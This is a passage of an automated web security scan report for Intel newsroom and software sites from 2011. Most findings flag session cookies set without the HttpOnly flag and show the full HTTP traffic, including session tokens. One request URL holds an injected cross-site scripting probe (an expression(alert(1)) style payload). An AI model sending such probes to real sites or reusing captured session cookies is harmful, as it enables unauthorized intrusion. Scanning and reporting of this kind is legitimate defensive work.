gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:03 GMT
Server: Apache
Set-Cookie: JSESSIONID=2ACD8803AAF9142ABE9BBE7400602B75.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=132338 t=1296956883117344
X-JSL: D=132344 t=1296956883117344
Content-Type: text/css
Connection: keep-alive
Content-Length: 84448


/* overrides for elements while customizing a page */
body.jive-body-widget-customizing #jive-body #jive-body-intro,
body.jive-body-widget-customizing #jive-body #jive-breadcrumb,
body.jive-body-wi
...[SNIP]...

12.19. http://newsroom.intel.com/4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=1B1A7CDD00A68C13A37ECE38A66CD9D7.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=131620 t=1296956878654373
X-JSL: D=131626 t=1296956878654373
Content-Type: text/css
Connection: keep-alive
Content-Length: 9250

/* Clearlooks 2 */

/* Reset */
.clearlooks2, .clearlooks2 div, .clearlooks2 span, .clearlooks2 a {vertical-align:baseline; text-align:left; position:absolute; border:0; padding:0; margin:0; backgroun
...[SNIP]...

12.20. http://newsroom.intel.com/community/intel_newsroom/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /community/intel_newsroom/?iid=ftr+press HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/about/index.htm?iid=gg_about-en_US+intel_aboutintel
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:11:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; Domain=.intel.com; Path=/
Set-Cookie: jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323031363b; Expires=Mon, 07-Mar-2011 23:11:11 GMT; Path=/
X-JAL: 613
Content-Language: en-US
CacheHit: D=624946 t=1296947469127528
X-JSL: D=624952 t=1296947469127528
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.21. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: newsroom.intel.com

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 01:56:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=0F9AA48CBC22DD7A7D0A421E6737E14C.node7IPR; Domain=.intel.com; Path=/
Set-Cookie: jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; Version=1; Path=/
X-JAL: 17
Content-Language: en-US
CacheHit: D=26624 t=1296957380484009
X-JSL: D=26628 t=1296957380484009
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.22. http://newsroom.intel.com/render-widget!execute.jspa

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /render-widget!execute.jspa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /render-widget!execute.jspa HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Origin: http://newsroom.intel.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947574107; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_sq=intelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA
Content-Length: 65

frameID=15023&size=1&widgetType=3&container=2016&containerType=14

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=6A2D969FD2F865ED814073478F5CD886.node6IPR; Domain=.intel.com; Path=/
X-JAL: 435
Content-Language: en-US
CacheHit: D=437180 t=1296956932677160
X-JSL: D=437186 t=1296956932677160
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close


<div class="content-large"></div>
<div class="content-small">

<ul class="jive-sidebar-rssfeed">
<li>
<span>Feb 2, 2011</span>

...[SNIP]...

12.23. http://newsroom.intel.com/theme/white/styles/theme.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /theme/white/styles/theme.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /theme/white/styles/theme.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=7359014C358600335C62FA09C3BE0B68.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=130334 t=1296956932271743
X-JSL: D=130341 t=1296956932271743
Content-Type: text/css
Connection: keep-alive
Content-Length: 2317


/* main default header */
#jive-global-header {
background: #dedede url(../images/jive-hdr-bg1.png) repeat-x top;
border-bottom: 1px #e9e9e9 solid;
}
#jive-global-header-texture {
bac
...[SNIP]...

12.24. http://onsite2.researchintel.com/engine/icorescript.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://onsite2.researchintel.com
Path:   /engine/icorescript.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /engine/icorescript.asp?s=15&sid=&c=&geo=0&f=NONE HTTP/1.1
Host: onsite2.researchintel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:12:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
cache-control: private
pragma: no-cache
Content-Length: 187
Content-Type: text/html
Expires: Thu, 03 Feb 2011 23:12:18 GMT
Set-Cookie: ASPSESSIONIDCSTRSASQ=DJKDPHKCHBEKBKLBIMAIHJGD; path=/
Cache-control: No-Store

clearTimeout(onsTimerB);function ONS_CoreSite(){ONS_sCookie(cn,'sid=9968985447329M1296947538033&stage=13',3,ch);ONS_showInvite();}onsUSID='9968985447329M1296947538033';ONS_initCore(true);

12.25. http://plugins.jquery.com/project/SimpleModal

Summary

Severity:   Low
Confidence:   Firm
Host:   http://plugins.jquery.com
Path:   /project/SimpleModal

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /project/SimpleModal HTTP/1.1
Host: plugins.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:21:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: SESSabdcf03bfc020aa07e9f024d8c52c72f=tcttbhd60i0t3is8770gbmmcb0; expires=Tue, 01 Mar 2011 02:54:53 GMT; path=/; domain=.plugins.jquery.com
Last-Modified: Sat, 05 Feb 2011 23:21:32 GMT
ETag: "a21bd565ad8681eec5d18d0535ad0a09"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-
...[SNIP]...

12.26. https://secure-newsroom.intel.com/cs_login

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure-newsroom.intel.com
Path:   /cs_login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cs_login HTTP/1.1
Host: secure-newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 05 Feb 2011 23:16:35 GMT
Server: Apache
Set-Cookie: JSESSIONID=A4CC37F1E2D36D9C40FE66EF20991E8D.node7IPR; Domain=.intel.com; Path=/
Set-Cookie: ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-JAL: 0
Location: https://secure-newsroom.intel.com/login.jspa
Content-Length: 0
CacheHit: D=2495 t=1296947795404257
X-JSL: D=2500 t=1296947795404257
Connection: close
Content-Type: text/plain; charset=UTF-8


12.27. http://software.intel.com/en-us/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
Date: Sat, 05 Feb 2011 23:21:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=80d3b7dbc1c511eec9e30e6313957d55; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 77398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
<he
...[SNIP]...

12.28. http://software.intel.com/en-us/articles/intel-cloud-builders-overview/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/articles/intel-cloud-builders-overview/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/articles/intel-cloud-builders-overview/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:22:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=9b9329ab03330eb2995d6e0b7cd5ee03; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 44663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.29. http://software.intel.com/en-us/blogs/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=b4b0122969a1cad358c7d154e5df9808; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 52451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.30. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/01/31/everyone-has-a-dream/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/01/31/everyone-has-a-dream/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=c6f20ace22b45018ab76495ba5248e67; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 42232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.31. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/01/31/everyone-has-a-dream/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/01/31/everyone-has-a-dream/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:58 GMT
Content-Length: 2468
Connection: close
Set-Cookie: PHPSESSID=102cf9ecae8791b0e6286744c176e520; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:58 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.32. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=5835ba1bbad9f78b6863c69132a212a2; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 40585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.33. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
